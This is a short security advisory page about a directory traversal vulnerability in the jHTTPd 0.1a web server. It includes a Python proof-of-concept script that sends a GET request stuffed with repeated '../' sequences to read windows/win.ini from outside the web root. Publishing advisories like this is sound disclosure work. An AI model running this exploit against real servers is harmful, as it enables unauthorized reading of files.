Home
Consulting
Advisories
Software
Articles
Contact

jHTTPd 0.1a Directory Traversal

Legacy Advisories

Description

A directory traversal vulnerability in jHTTPd 0.1a can be exploited to read files outside of the web root.

Proof Of Concept

import socket, urllib

host = 'localhost'
port = 8082
file = 'windows/win.ini'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)    

print 'sending'

s.send('GET ' + '../' * 16 + file + ' HTTP/1.1\r\n'
    'Host: ' + host + '\r\n\r\n')
print s.recv(8192) + s.recv(8192)


Copyright © 2018 AutoSec Tools LLC